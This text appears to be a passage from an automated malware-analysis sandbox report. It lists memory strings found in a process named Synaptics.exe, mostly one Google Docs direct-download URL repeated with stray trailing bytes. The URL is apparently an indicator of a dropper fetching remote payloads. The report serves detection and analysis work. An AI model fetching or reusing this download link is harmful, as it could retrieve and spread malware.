                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo$
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorL
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorp
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadosni
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpPm
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadppI#y
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqER
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...W
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...w
                                Source: Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.k
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.t
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrand4
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrc
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrc/%c
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrek
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadri
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrker-
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrm
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrm-Ve
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrm-fa
                                Source: Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrsh
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrsio
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrust%
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrv
                                Source: Synaptics.exe, 00000002.00000002.2959950848.000000000532C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadso
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsolv
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt8
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt9
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtfor
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadti
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadti9
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtiJJc
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl8
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlT
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlenhoG
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlt
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadttp/
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu2
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduDn
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3017903336.000000001D6FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduV
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadub
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadub%
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaducatiP8U
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadull
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadun
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadunP
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadut
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadviT
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3070010239.000000003B051000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwi
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadws
